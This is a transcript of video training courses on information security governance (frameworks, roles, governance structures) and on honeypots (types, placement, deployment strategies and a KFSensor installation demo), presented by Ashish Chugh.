the base of security governance. If they are not defined, then security governance
cannot be implemented in proper fashion. If they are defined and implemented,
most of the jobs of the security governance is already done.
Moving next, the level of security protection is based on the risk appetite. Which
means you do not keep implementing security controls, but you implement them to
mitigate risks that you foresee. Therefore, depending on the risk appetite of an
organization, the security controls must be implemented. They must be inline with
the risk appetite of an organization. The organization must manage information
security actively. Which means the security team, actively performs its job in
monitoring the infrastructure. The security controls are reviewed on periodic basis
and changed as and when needed.
Risks and Opportunities
[Video description begins] Topic title: Risks and Opportunities. The presenter is
Ashish Chugh. Absence of Security Governance. [Video description ends]
Let's now look at what happens if there is an absence of security governance. The
organization does not have security policies or procedures. Even if the organization
does, the security policies and procedures are outdated, and they cannot be
followed with the current security posture. Then there is an absence of an authority
figure for decision making related to security, infrastructure assets, and the
infrastructure itself. Since this person is missing, the correct decisioning is
sometimes not made. Then, starting from the top level, which is the board, to the
last user which is an employee, there is hardly any awareness of security practices.
The security policies and procedures are virtually unknown. This means there is no
user training and this does not involve everyone in the organization, even if the
training takes place. So for instance, the board itself is not trained properly on the
security lines. Moving ahead, the servers, the systems, and the other critical
infrastructure does not have adequate hardening. There are no methods of patch
management implemented.
Now when you talk about hardening, there is a certain baseline you create when
you roll out an operating system on a system. Now once the baselining is done, you
harden the system. That means that you stop the unnecessary services, you
implement proper security controls like antivirus, firewall. You close out the open
ports that are not required. So this is what is involved in hardening a system. Now
if that is not done, virtually every system is prone to an attack. Then there are no
audits for security compliance, and therefore no remediation to the current
processes or the infrastructure. Everything runs in as is mode. Now since there are
no compliance audits happening. You do not know whether the current
infrastructure has good security posture or bad security posture. You do not know
whether the risk are being mitigated or not. You do not know whether the existing
security controls are adequate or not. Let's now look at the reasons for ineffective
security governance. So first of all, there is no authority delegation. Which means
there is no authority that is defined who can make decisions for security
implementation. Or who can drive the security team to look at the security posture
of the organization. Then there is no budget control authority, which means budgets
are not properly defined.
There is nobody who can monitor the budgets assign to the security team. Or it
could be possible since there is no authority to look after the budgets. There are
sometimes inadequate or insufficient budgets for the security team to put enough
security controls in place. They might want to buy new hardware or software, but
they are unable to do that. There are infrequent or no meetings. Security team again
works in silos. They do not interact with the other teams which could be a project
team, which could be operations team, or even the management. So since there are
no discussions or there are no meetings taking place regarding the security
governance or security practices. Then this becomes a problem and this clearly
indicates that there is ineffective security governance. Then there is untimely
decision-making which is often due to poor quality of data that does not allow a
person to make a decision. So the person has to spend time in doing maybe some
research, thinking over it or discussing with the other members in the organization.
But by the time, the decision itself becomes untimely. Then there is lack of
management buy-in. Because the management is not involved, they're not looking
at the security as a business problem. Therefore, it becomes very difficult for the
security team or its leader to convince the management on, let's say, buying new
hardware. Or implementing something new within the infrastructure to tighten up
the security.
[Video description begins] Opportunities by Security Governance. [Video
description ends]
Let's now look at the opportunities created by security governance. So first of all,
you're able to identify high-risk vulnerabilities. This can happen because there are
timely security practices that are put into place to find the unknown hardware or
software flaws. And the security vulnerabilities. This is possible because you would
run vulnerability assessment, you would also run penetration testing from time to
time. And figure out the smallest vulnerability to the biggest vulnerability that is
existing within the infrastructure. And an effective security governance also uses a
proactive security approach. It helps you not only find vulnerabilities but it also
helps you find the risks and the possible threats that may occur within the
infrastructure. With this, you are able to exploit real security risks. Because you are
using a proactive security approach, you are able to exploit real security risks.
Which means that you are able to not only detect them, but also put in security
controls and various other measures to mitigate them. With the help of proactive
security approach, security governance also helps you detect known and unknown
flaws. Which have nothing but the vulnerabilities that may exist along with the
risks within the system. It also provides advice to handle these vulnerabilities.
Which means it gives you guidance to assess and validate the efficiency of
defensive mechanism. For beyond the depth of analysis provided by vulnerability
assessments. In identifying whether any weaknesses are originating from any kind
of errors which may be human or technical.
Let's now look at some of the best practices of security governance. Information
security activities should be governed based on relevant information, requirements.
Which may be including laws, regulations, and organizational policies. Information
security responsibilities must be assigned and carried out by appropriately trained
individuals. This means individuals responsible for information security within the
organization must be held accountable for their actions or lack of actions.
Information security priorities should be communicated to the stakeholders of all
levels within the organization. To ensure successful implementation of the security
program. This means that you must involve the senior management of the
organization. Information security activities must be integrated into other
management activities. To ensure that they are able to accomplish business goals
and the vision of the organization. Information security should be continuously
monitored for the performance. The designated individuals within the security team
should continuously monitor the performance of the security program. For which
they are responsible. And they should use tools to ensure that appropriate
information is generated for the performance of the security program.
Information discovered through the monitoring should be used as input into
management decisions. About priorities and funding allocation to effect the
improvement of the security posture and the overall performance of the
organization. Also, as one of the best practices of security governance. You have to
ensure that each stakeholder which could be in the board steering committee is
aware of the information security priorities. It has to be also ensured that each
stakeholder which is either part of the board or steering committee is aware of the
security information priorities. And they are able to provide valid input to
implement security governance. End of section six.
Security Governance Program
[Video description begins] Topic title: Security Governance Program. The
presenter is Ashish Chugh. [Video description ends]
Let's now look at what are the Security Governance Program Goals are. First of all,
you need to identify the need for compliance framework. You have to visualize
whether there is a requirement for a governance framework. And if there is, which
type of governance framework are you looking for? For example, if you are in the
medical industry and keeping patient records. PCI DSS is not the appropriate
security governance framework that you will want to apply. You would rather go
for HIPAA which is applicable for the medical industry. Then you also need to
ensure that the security governance framework also aligns to the management
security goals.
You have to keep a track of those goals and you have to benchmark against the
security governance framework that you're applying. You also need to know the
type of data you handle. The example just I stated, if you are in the medical
industry you will not opt for PCI DSS or ISO27001. You will want to go with
HIPAA, which applies for the medical industry. You would also check if there are
any existing compliance standards applied within the organization. You may not
have opted for any compliance framework but there would have been enough
security policies that would have been implemented. You have to ensure if those
are implemented you do not simply through them away. But tweak them or modify
them according to the new security governance framework that you are opting for.
To implement a security governance framework, you need to do the following.
[Video description begins] Process for Implementing Governance
Framework. [Video description ends]
First of all, you need to identify the governance requirements. Without this, you
will not be able to opt for an appropriate governance framework. Then you need to
know what type of governance framework you are looking for to meet your
requirements. As an adoption for governance framework it would depend on the
nature of business of the organization. Finally after the identification of the
governance framework you need to implement it each type of governance
framework is different in nature and its implementation will vary. Therefore you
need to carefully plan the implementation after thoroughly understanding how it
works.
Governance Framework Structure
[Video description begins] Topic title: Governance Framework Structure. The
presenter is Ashish Chugh. [Video description ends]
Let's now look at the needs for a security governance framework. First of all, if you
do not have any kind of security compliance within your organization, you may
need to use a particular governance framework as a pre-defined structure. So each
one of the governance framework gives a pre-defined structure that you can use to
implement compliance and governance within your organization. It might also be a
legal or contractual requirement. Several times when an organization is outsourcing
a project to another organization which is smaller in size, they want the smaller
organization to be compliant with one of the compliance framework. However, it
solely depends on the nature of the project that is being outsourced. A security
governance framework also helps to engage the entire organization. Earlier we
discussed board has certain responsibilities which are defining the security strategy.
Users have certain responsibilities, which is adhering to the security policies that
have been defined. Therefore the entire organization becomes engaged when a
security governance framework is implemented. It also helps you define clear roles
and responsibilities.
Now, if you take the example of ISO 27001, it involves the management where
they have to state that they are going ahead with the ISO 27000 program. So there
is an approval from the management. Therefore, it also involves management
within the program, which is the security governance framework. It also gets them
to pay little more attention. Now, when there is no security governance, the
management is least bothered about the security within the organization. However,
when security governance framework is implemented and security governance
comes into existence, the management is involved. Because earlier we discussed
there is a steering committee, there is a board of directors which is known as the
board. All are involved at different times and creating security strategies creating
security policies, implementing them. So their involvement becomes a must when
security governance framework is applied within an organization. Let's now look at
governance framework structure,
[Video description begins] A governance framework structure is displayed on the
screen. It contains four domains that are called Develop, Implement, Deploy, and
Enterprise. The Develop domain contains three teams that are called Architecture
Board, Enterprise Architects, and Domain Architects. The Implement domain
contains two teams that are called Programme Management Office (PMO) and
Implementation Projects. The Deploy domain contains two teams that are called
Service Management and Systems. The Enterprise domain contains seven teams
that are called Operational Standards, Roles & Responsibilities, Regulatory
Compliance Requirements, SLAs/OLAs, Architecture, Process, and
Solutions. [Video description ends]
which clearly displays the roles and responsibilities and how each one of them is
tightly integrated with each other. The structure for the security governance body
can vary depending on the organizational structure and how it operates. Now in this
particular scenario, if you look at there are three different domains that have been
defined which is develop, implement, deploy. So there are certain teams, the first
one is the board which provides the guidance. Then comes the CTO and CIO which
implement and then there is a security team which deploys and manage these
services management. Then with the entire enterprise, there are operational
structure, roles, and responsibilities, regulatory compliance requirements, etc. All
of these are tightly integrated with each of the domains which are developed,
implement and deployed. Let's now look at governance framework structure
elements. So there is a risk management methodology which helps you identify and
mitigate risks. Then there is a security strategy which is tightly integrated with the
business objectives and the mission of the organization. And it brings out the value
of information that needs to be protected. Then there is a security organizational
structure which defines who is at the top, and who is going to do what.
So basically, roles and responsibilities are also defined based on the security
organizational structure. Then comes the security policies, which help you address
the strategy. It helps you put in the security controls and it helps you meet the
regulatory requirements. Then, you also define several security standards for each
policy that has been implemented. After all this has been done, then you continue
to monitor your security processes and you put in a continued evaluation process.
And if this process is missing, then of course, your security becomes pretty static.
Once you implement it, you will not go back and change. Therefore, you have to
monitor and then you have to continuously evaluate the security processes and
make improvements accordingly.
Let's now look at security governance activities, so we have three different sets, one
is the role, responsibility and task. So roles are defined within the senior
management steering committee and chief information security officer, which is
part of steering management. The responsibility for senior management is defining
the business strategy, and the task it plays is, that it has to meet the organizational
objectives. Which means the business strategy needs to meet the organizational
objectives which are mission and goal statements. Then you have the steering
committee. Its responsibility is to define risk management and the information
security strategy. So what it does is, it brings out the security requirements for the
organization. Then comes the chief information security officer steering
management, which not only drives the security action plan, policies and standards.
But they also play a key role in security programs, the implementation of security
program and the security controls. They also ensure that the security objectives are
aligned to the organizational objectives. And going forward, they continuously
monitor the existing security posture, and create metrics reporting, which over a
period of time, gives you the trends of the security posture within the organization.
[Video description begins] Security Governance Structure. [Video description
ends]
Security governance can have different type of structures. These structures could be
centralized, decentralized, and hybrid. Going forward, we will look at each one of
them. So when you talk about the centralized governance structure, everything
in this regard to security governance is controlled by a centralized team, which
consists of top executives of the organization.
[Video description begins] Centralized Vs Decentralized Governance
Structure. [Video description ends]
For example, chief information security officer would be part of the centralized
governance structure. This team maintains the budgets. It also looks after the
security component implementation which are nothing but the security controls and
tightens the security posture. And it also performs continuous monitoring. The
decentralized governance structure oversights the responsibilities at the department
level. And the responsibilities are also distributed at the department level, and
similarly, the budget is also at the department level. So there is nothing centralized,
everything works at the department level. Let's now look at hybrid governance
structure. It is a combination of centralized and decentralized structure. Some
responsibilities and tasks are distributed at the department level. But most of the
control is maintained at the central level, which is at the organization level. Now
for example, if you look at budget, it would be probably maintained at the
centralized level, not at the department level. However, the implementation part
could be distributed at the department level.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the importance of security governance
and to learn how it plays a key role in security strategy. We did this by covering the
role of security governance. We also covered different types of governance. We
also looked at the role of senior management in the security governance
programme.
We also learned about rolling out a security governance program. We also covered
the tools and controls to enforce security governance. In our next course, we will
move on to explore the honeypots and how it fits in to a security strategy.
Information Security: Honeypots
Explore various honeypot concepts, such as the types of honeypots, roles and uses
of a honeypot, and how honeypot data analysis is used. In this 12-video course, you
will examine strengths and weaknesses of a honeypot and how it is placed in
networks. Key concepts covered in this course include the honeypot system itself,
configured to detect, deflect, or counteract any unauthorized attempt to gain access
to information; learning the various types of honeypots that can be used focusing
on low and high interaction level types; and learning about the role played by
honeypots in overall network security. Next, you will examine learn honeypot uses
and disadvantages; learn the deployment strategies of a honeypot; and learn the
various open-source and commercial honeypot products available on the market.
Finally, learners will observe how honeypots are placed in a network; how to install
and configure a honeypot by using KFSensor honeypot software; and explore how
honeypot data analysis is captured through automated software or through a manual
method.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh, an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh, and I have more than 25 years of experience in IT
infrastructure operations, software development, cyber security, and e-learning. In
the past, I've worked in different capacities in IT industry. I've worked as a quality
assurance team leader, technical specialist, IT operations manager, delivery head
for software development, and cyber security consultant. I have a bachelor's degree
in psychology and diploma in system management.
My expertise are IT operations and process management. Other than this, I have
various certifications which are Certified Network Defender, Certified Ethical
Hacker, Computer Hacking Forensic Investigator. And there are various
certifications from Microsoft which are MCSC, MCAC, MCP. I'm also certified
Lotus professional. In this course you will learn about the fundamentals of
honeypots. You will understand the role of honeypots in security. You will also
learn about different types of honeypots, and different types of honeypot
architectures. This course will also cover the weaknesses of a honeypot.
Honeypot Introduction
[Video description begins] Topic title: Honeypot Introduction. The presenter is
Ashish Chugh. [Video description ends]
A honeypot is a system that simulates a real system.
[Video description begins] Honeypot. [Video description ends]
It is configured with several vulnerabilities. It is a system that is configured to
detect, deflect, or counteract to any unauthorized attempt to gain access to
information. The real reason why honeypots are put into the place is because they
do not have any real data, they do not have any kind of critical information stored.
They just simulate a real system so that the attacker can get attracted to this system
and come and attack. Therefore, you will be able to capture lot of information of
the hacker has attacked, what kind of movements hacker has made, and what was
the strategy hacker use to attack this system.
Remember that a honeypot does not contain any production on real data. It is just a
simulation of a real system, so there is no legitimate traffic that is sent or received
from the honeypot. This means that a honeypot is designed to sit idle. And if there
is any activity on the honeypot, it should give you a reason to be suspicious. Its
main intent is to attract a hacker. You need to monitor the honeypot on continuous
basis so if there is any attack that occurs, you are able to capture that information
and act on real time. A honeypot, if it is sitting idle, it has no use. It can only be
useful once it is compromised. It will give you enough data through the log files
that you can examine.
Types of Honeypots
[Video description begins] Topic title: Types of Honeypots. The presenter is Ashish
Chugh. [Video description ends]
There are primarily three types of honeypots, interaction level, implementation
type, and purpose-specific. In the next few slides, we'll be looking at each one of
them.
[Video description begins] Interaction Level - Low. [Video description ends]
In the interaction level types of honeypots, there are two types, low and high. Let's
look at the low interaction level honeypots. This is the type of honeypot that uses
limited system resources. Such a honeypot also has limited interaction with the
external system. It does not involve any kind of operating system, and only runs a
few limited set of services that can be used to attract the hacker. It gathers minimal
amount of data. Since there are only limited number of services running, they can
gather only limited amount of data. It also has minimum risk as there is no
operating system involved.
Remember, when there is an operating system involved, there are a high chances
that the entire system can be exploited. But since there is no operating system
involved, there are very limited chances of full exploitation of the system. Exposes
the services that cannot be exploited and provides complete access to the system.
Because there are only few set of services and these services are such that they
cannot be exploited, but they are good enough to attract the hacker. Limits the
attacker to a level of emulation provided by the honeypot. Attacker can only work
with the services that are provided on the honeypot. Now, beyond that, the attacker
does not have any kind of access. The examples of such honeypots are HoneyBOT,
Honeyd, and KFSensor.
[Video description begins] Interaction Level - High. [Video description ends]
Let's look at now interaction level-high types of honeypots. Unlike the interaction
level-low honeypot, interaction level-high honeypots involve real operating system
and applications. They can be exploited in full capacity by the hacker. Because
there is an operating system involved, there are real applications that are involved,
therefore it can be exploited. And they are complex in nature. Whereas the low
interaction level honeypots are pretty easy to deploy, you have to just install the
application and give access to few services.
Interaction level-high honeypots are complex in nature and they are difficult to
deploy. Provides a real system with the operating system and application to the
hacker. The hacker here cannot visualize whether it is a honeypot or it is a real
system. Because this type of honeypot has a real operating system, real set of
applications, and some bit of data that the hacker can be confused with. One of the
big problem with these kind of honeypots is that these can be compromised in full
capacity. And, therefore, it allows the hacker to launch attacks on the other systems
as well. Some of the examples are Symantec Decoy Server, HoneyWall, and
Specter.
[Video description begins] Implementation Type. [Video description ends]
Now, let's look at implementation type. There are primarily two types, physical and
virtual. Physical systems are real systems. These are the servers you will deploy the
honeypot on. So you will take a physical server, you will deploy a honeypot
application on top of this system. These have their own IP Addresses. Each server
is assigned a specific IP Address. They are difficult to deploy and maintain. This is
because each physical server did not only takes up the physical space in the data
center, it also requires electricity. It also requires the manpower to maintain them.
And one physical server can run only one operating system, even though you can
dual boot them. But you can only run one operating system at a time. And they are
more expensive, in terms of not only the maintenance but also purchase of the
server, purchase of the application. Then you need to have the manpower to
maintain them.
On the other hand, if you look at virtual, they are also deployed on a physical
system but they are deployed in the form of virtual machine. So which means on
one single physical system you can have ten virtual machines running, but it
depends on the capacity of the physical server. They are easy to deploy and
maintain. You can always move around the virtual machine. So if one server runs
out of capacity, you can take that virtual machine and deploy it on another system
or another server. And it is pretty obvious that each virtual machine can run a
different type of operating system. So for instance, you can deploy a honeypot on
Windows. You can take another honeypot, which runs only on the Linux system,
and you can run them parallelly on the single server.
[Video description begins] Purpose-specific. [Video description ends]
So now let's look at purpose-specific. So you have two types, production and
research. Production honeypots capture limited information. They're easy to
deploy. They use a specific method, which is prevention, detection, and response
method. And these are usually used in the organizations. Are deployed to protect
the network. On the other hand, if you look at research honeypots they are
deployed to learn new methods. Gather intelligence on the threats and the type of
tools that have been used in the attack. Such honeypots are designed to track
attacker's progress and the methodology used in the attack.
Research honeypots are complex to build. They are complex to deploy. And they're
also used not by the organization as such, but they are mainly used by universities,
governments, military. And the data they gather has no direct value to the
organization. So basically, what this means is the research honeypots the type of
data they gather does not provide any value to the organization in terms of it cannot
help them protect their own network. Rather, this type of data is more useful for the
universities, or militaries, or research type of organizations, so they can study the
attack methods.
Role of Honeypots in Security
[Video description begins] Topic title: Role of Honeypots in Security. The presenter
is Ashish Chugh. [Video description ends]
Role of a honeypot in security. Remember, a honeypot is not a real system, and it is
not meant to be interacting with any system on the network. Therefore, it does not
expect any data from any device or any user. If there is any interaction happening
with the honeypot by any device or a user, you can be very sure that this is a
malicious traffic that is being targeted towards honeypot. It does not send or
receive any traffic, it does not interact with the systems or any user on the network.
Therefore, any traffic towards a honeypot or leaving from honeypot is considered
to be suspicious. A honeypot is not designed to solve any kind of security problem,
but it is considered to be an add on into the network security. If you think about it,
you have enough devices that can provide security on the network. For instance,
you have firewall, you have intrusion prevention systems, you have intrusion
detection systems, and there are various other security devices such as data link
prevention. All these devices are doing their jobs.
Now what role a honeypot plays in the security is, it sits on the network or outside
the network and it attracts a hacker to come and exploit itself. The reason that is
done is so that the attacker can come in, do various things, and you are able to
collect a lot of information about that particular attack. In order for that to happen,
you have to keep that honeypot out there in the open or place it in such a way that it
can collect this kind of information. A honeypot not necessarily will generate high
amount of data. It will gather small amount of data for instance, it might just
capture the attack information on a particular port, let's say port 80. It will give you
that kind of data. Now based on that data, you can create some value out of it by
studying it, analyzing it, and understanding what attack has happened, where it has
happened. And it can also be used to capture new tools and techniques that have
been not used earlier.
So lot of hackers come out with new custom tools. When they attack a particular
system on the Internet, they use these tools, they exploit them. Most of these tools
have not been used earlier because these are customized, they are developed by the
hackers. So the honeypot can capture that kind of information and their
methodology and figure out what has happened on the honeypot. And you can
understand later on by studying the data that has been captured.
Disadvantages of a Honeypot
[Video description begins] Topic title: Disadvantage of a Honeypot. The presenter
is Ashish Chugh. [Video description ends]
Disadvantages of a honeypot. Along with the advantages, there are several
disadvantages of a honeypot. It can be fingerprinted to determine whether it is a
real system or it's a honeypot. This problem typically happens if you put a low
interaction honeypot. Remember, in the previous slides we learned a low
interaction honeypot runs only a few systems. An experienced hacker can easily
figure that out, whether it's a real system or a honeypot. Because hacker is not able
to interact beyond a certain set of services, it would be easy for the hacker to figure
out that it's a honeypot. It can lead to compromise other systems on the network.
This problem typically happens with high interaction honeypot. Because high
interaction honeypot runs an operating system, it runs real applications, it has some
amount of data and it is connected to the network.
If the operating system or the applications are compromised, the hacker can
actually get onto the network and compromise the other systems that are there.
Therefore this is one of the main disadvantages of high interaction honeypots. A
honeypot is only able to detect the attacks that are directed to it. If no attacks are
directed to it, it cannot detect or prevent anything. Another issue that might happen,
if the hacker identifies that this system is a honeypot, he or she can easily bypass it
and attack the real systems. Honeypots can also be difficult to build, configure and
deploy. This is a typical problem with the high interaction honeypots. On the
contrary, low interaction honeypots are easy to deploy. It can also be used as a bot
to attack other systems on the network. Now if this is a high interaction honeypot
and it has been compromised, a hacker can actually use this particular system as a
bot or zombie to attack the other system on the Internet. This kind of participation
is usually involved in the distributed denial of service attacks.
Honeypot Uses
[Video description begins] Topic title: Honeypot Uses. The presenter is Ashish
Chugh. [Video description ends]
Uses of a honeypot. Honeypots help you detect the hackers' activities and their
methodology. With the help of data that you have collected, you can gain insight
into future attacks that may occur.
[Video description begins] Honeypot lure the attackers. It captures attacks and
provide their information. [Video description ends]
Because if a hacker has used a specific methodology to attack the honeypot, there
are high chances the hacker will return and use the same methodology. Therefore, it
is very useful for you to gather such information and study it carefully. A honeypot
is designed to capture incoming malicious traffic. Remember, a honeypot does not
supposed to be interacting with any system on the network or on the Internet. So
any incoming traffic is considered to be malicious. You have to capture this traffic.
You have to understand what the hacker is doing and study the logs.
A honeypot also reduces the burden of purchasing new software or hardware to
strengthen your network. This is because the same method, an organization would
typically purchase new hardware or software to prevent an attack from a hacker.
This can be done by doing packet analysis and understanding what is happening on
the network. A honeypot can do the same job with bare minimum cost. Or, in fact,
there are a lot of open-source honeypots that are available that can be deployed and
used.
Honeypot Deployment Strategies
[Video description begins] Topic title: Honeypot Deployment Strategies. The
presenter is Ashish Chugh. [Video description ends]
Honeypot deployment strategy. You should install honeypots along with the
production servers. The reason for this is that honeypot will likely need to mirror
some real data and services from the production server. This is required so that the
attackers can actually be confused whether it is a real system or it's a honeypot. The
security of a honeypot can be loosened slightly, so that there are high chances of it
being compromised. You can also double-up each server with a honeypot to
redirect suspicious traffic. For instance, traffic at TCP port 80 can be redirected to a
web server, whereas the remaining traffic that is being redirected to a web server
can be directed towards a honeypot. To be able to use this strategy, you need to
replicate some of the data, such as website content, on the honeypot.
You should also build a honeypot rather than using a single honeypot server. For an
experienced hacker, it is easy to figure out whether it's a honeypot or a real system.
But now, if you have a honeynet, which is a collection of multiple honeypots, it can
confuse a hacker whether it's a real network or it's a simulated network. You can
also have different types of applications that are available running on different
types of honeypots. For instance, it could be a honeypot running on a Linux server,
or it could be a honeypot running on a Window server. It will help you gather a lot
of information if any of the honeypots is under an attack. Another strategy that you
can use is, you can also put a sacrificial lamb, which has nothing to do but wait to
be attacked. This strategy is based on a lion and the lamb story.
When the hunters used to go in the jungle, they needed something to attract the
lion. This specific strategy is also being used in honeypots. So you put up a system
which is a simulated system, and you wait for it to be attacked. But if it is not
attacked, you can't really do anything about it. You can also use port redirection
and reroute the traffic from one port to the other port on the honeypot. You can also
use the Minefield strategy, where honeypots are being monitored regularly and
continuously by an intrusion detection system or a vulnerability scanner.
Available Honeypot Products
[Video description begins] Topic title: Available Honeypot Products. The presenter
is Ashish Chugh. [Video description ends]
Low-interaction honeypot products. Even though there are lot of products that are
available as low-interaction honeypot, but the three primary ones are Honeyd,
KFSensor, and HoneyBOT.
[Video description begins] High Interaction Honeypot Products. [Video description
ends]
There are several products that are also available as high-interaction honeypot
products. This is Spector, Symantec, and HoneyWall.
Placement of Honeypot in a Network
[Video description begins] Topic title: Placement of Honeypot in a Network. The
presenter is Ashish Chugh. [Video description ends]
A placement of a honeypot can be internal or external to a network. It can also be
placed in a DMZ. Let's look at each one of them in detail in next few slides.
[Video description begins] External Honeypot. [Video description ends]
External honeypot have no firewall protection, they are basically hosted on the
Internet. They use a public IP from the production network. They can also be
monitored by a management system. So for instance, you have a specific
management and monitoring system that would be specifically placed to monitor
the honeypot. It is likely to attract more hackers as it is in the public domain.
Remember this is a system which has lot of security loopholes. It is placed on the
Internet, it does not have any kind of protection such as, there is no firewall
protection that is available for this honeypot. So it is likely to attract more hackers.
It has high Internet exposure.
Again, it is using a public IP. It does not have a firewall protection therefore the
exposure on the Internet is extremely high. It's easy to set up, all you need to do is
assign a public IP address and put it on the production network and let it face the
internet. It requires low number of network devices. There is no special
configuration required. There are no special network devices required for this
particular honeypot. And it provides poor data control, because even though it
simulates some amount of data, there is no real control that you would have on this
particular system. It can also be a risk to a production network.
Remember this is also placed on a production network but it is public facing, it is
Internet facing. So what happens is, when it is attacked, there are high chances that
the hacker would not only compromise the honeypot, but would also have the
liberty of compromising the other systems on the production network. Now let's
look at the diagram of external honeypot. So like I said earlier, there is no firewall
protection on this particular honeypot. So you have the Internet, router, then there
is a switch or a hub that is connecting the honeypot and the production network.
And then there is a monitoring system which is placed specifically to monitor the
honeypot.
[Video description begins] Internal Honeypot. [Video description ends]
Let's now look at internal honeypot. They are used to detect attack that have passed
through the firewall. So there is a firewall protection, but if there is certain type of
traffic that has passed through the firewall, honeypot should be able to capture that
traffic if it is redirected towards that system. Which is the Honeypot. It can lead to
compromise of the internal systems because honeypot is placed on the production
network. It is internal, but it is protected by the firewall. If honeypot is
compromised, there are good chances that the hacker will be able to compromise
the other systems on the production network.
The only difference between external honeypot and internal honeypot is that,
internal honeypot does not have a public IP address and is protected by a firewall.
Because there are multiple layers of security devices involved, so there is a
firewall, there is an intrusion detection system, it is complex to deploy but it also
works as a early warning system. So if this system gets compromised, the intrusion
detection system should be able to give you a warning stating that honeypot has
been compromised. And it is more complex in deployment, because there are
multiple security devices that are involved, you have to configure intrusion
detection system to monitor honeypot traffic. You have to have a firewall, which
should be protecting the internal network. The architecture becomes quite a bit
complex. Let's now look at how internal honeypot is deployed.
[Video description begins] A diagram displays Internet, which is connected
through the Router. The router is connected to the Firewall. The Honeypot and
Intrusion Detection System are connected to the Switch/Hub. It also includes the
Monitoring System and Production System that are part of the Production
Network. [Video description ends]
In this graphic, if you look at the internal honeypot is protected by a firewall and it
is located on the internal network. It is also being monitored by the intrusion
detection system. You also have a monitoring system which is monitoring the
honeypot.
[Video description begins] DMZ Honeypot. [Video description ends]
Let's now look at DMZ honeypot. A DMZ honeypot is placed in the DMZ. It is
placed with the other servers. It uses the same IP range that has been assigned to
the other servers in the DMZ. It helps you provide good data control. And it is most
complex in deployment as compared to internal and external honeypots. This is
because, you have to be very sure how you're placing this honeypot in the DMZ
zone.
DMZ zone has limited exposure to the internal network but it has more exposure to
the external network. Therefore, there are less chances that the internal network
will get compromised. But if the honeypot gets compromised, it can be a danger to
the other servers in the DMZ. Let's now look at the DMZ honeypot architecture.
There is the internet to which your organization connects to the router. Then there
is a firewall which is filtering incoming and outgoing traffic. The firewall is also
connected to a another router, which is configured for the DMZ. And then you have
the DMZ production and honeypot which are connected together.
[Video description begins] The Production DMZ and Honeypot are connected to
the Switch/Hub. [Video description ends]
This honeypot is part of the production DMZ, and there is an intrusion detection
system which is monitoring the traffic of the honeypot. And then there is a
monitoring system which is also monitoring the honeypot. So this was the DMZ
honeypot architecture.
Install and Configure a Honeypot
[Video description begins] Topic title: Install and Configure a Honeypot. The
presenter is Ashish Chugh. [Video description ends]
In this demo we will install KFSensor, which is a honeypot application. Now,
honeypot application KFSensor can work with or without packet capturing
technology. If you need the packet capturing feature to be enabled, then you need to
install either WinPcap or Npcap. However, KFSensor always prefers to use Npcap
over WinPcap because of its updated code base. So let's first install Npcap, post
which we will install KFSensor.
[Video description begins] The File Explorer window opens. The window is divided
into three parts. The first part is the menu bar. The second part is the navigation
pane. The Downloads folder is selected. The third part is the content pane. It
contains files called: npcap-0.9983 and kfsense40. [Video description ends]
User Account Control dialog box, click Yes to proceed. [Video description
begins] He double clicks the npcap-0.9983 file. [Video description ends] The
Npcap Setup Wizard is now displayed. On the license agreement page, click I
Agree. [Video description begins] A wizard called: Npcap 0.9983 Setup opens. A
page called: License Agreement is open in the wizard. [Video description ends]
On the installation options page, click Install. The installing page is displayed, this
will show the installation progress of Npcap. If you want to see the detail of Npcap,
then you can just click on the Show details button. The installation takes a few
minutes. Post this installation, we will proceed with the installation of KFSensor.
After the installation is completed, click Next. On the finished page, click
Finish. [Video description begins] The File Explorer window opens. [Video
description ends]
Now, we have installed Npcap, which is a packet capturing application. Doubleclick on the kfsense40 executable. Windows Installer dialog box is displayed now.
So it's preparing to install the application. KFSensor Evaluation Setup Wizard is
displayed on the Welcome page, click Next. [Video description begins] A wizard
called: KFSensor Evaluation Setup opens. A page called: Welcome to the
KFSensor Evaluation Setup Wizard is open in the wizard. [Video description ends]
On the End-User License Agreement page, click I accept the terms in the License
Agreement, click Next. On the Destination Folder page, keep the default
installation path, and click Next. On the Ready to install KFSensor Evaluation,
click Install. It's a pretty straightforward installation, there are no complications in
the installation, as it is GUI based. Once it is installed, then we'll be able to use
KFSensor. So User Account Control dialog box is displayed, click Yes.
Now the installation progress is displayed. The installation doesn't take much time,
it's only a few minutes job. Once it is installed, we'll be able to use the application.
Notice that it's now showing Starting services, the installation is done. It's now
starting the services. Keep Launch KFSensor option selected. [Video description
begins] A page called: Completed the KFSensor Evaluation Setup Wizard
opens. [Video description ends]
On the completed page, click Finish. You're done with the installation of KFSensor,
which is a honeypot application. Okay, so it's not able to locate WinPcap. [Video
description begins] A message box called: KFSensor - Warning opens. A message,
“WinPCap installation not located. Network protocol analyzer functionality
disabled.” is displayed. [Video description ends]
So, network protocol analyzer functionality will now be disabled, so which is okay.
For this demo we don't really need it. [Video description begins] He clicks the OK
button. The message box closes. [Video description ends]
So notice that there is some bit of traffic on different ports, which is fine, this
traffic is okay. [Video description begins] A window called: KFSensor Professional
- Evaluation Trial opens. It is divided into four parts. The first part is the menu bar.
The second part is the toolbar. The third part is the navigation pane. A folder
called: kfsensor - localhost - Main Scenario is selected. It further includes folders
called: TCP and UDP. The fourth part is the content pane. The content pane
displays the information for the folder selected in the navigation pane. [Video
description ends]
There's nothing to worry about. Just remember one thing, honeypot is not designed
to send or receive traffic. So if there is any traffic that is directed towards the
honeypot, you should analyze that traffic. So this is now configured. This is my
host system on which this virtual machine has been set up. [Video description
begins] He selects a file called: 138 NIIT Datagram Service - Recent Activity in the
UDP folder. [Video description ends]
So this is fine, this is the VMware applications DHCP server, so there is no
suspicion on this traffic. [Video description begins] He selects a file called: 67
DHCP - Recent Activity in the UDP folder. [Video description ends] So let's see if
there is some bit of traffic that we can generate, Split up the default homepage. So
what I've done is from my host system, I've connected to the IIS website running on
3128 port. [Video description begins] He opens the Internet Explorer window. He
selects the address: 127.0.0.1:3128/ in the URL text box. He switches to the
KFSensor Professional - Evaluation Trial window. [Video description ends]
Notice that it's already started to pick up the alarms that somebody is already
connected. So this is a typical role that a honeypot plays. [Video description
begins] He selects a file called: 3128 IIS Proxy - Recent Activity in the TCP folder.
It’s information is displayed in the content pane in a tabular format. [Video
description ends] Anybody who is trying to connect to any of the ports that are
available on this honeypot, it's going to capture that traffic. Now, the benefit of this
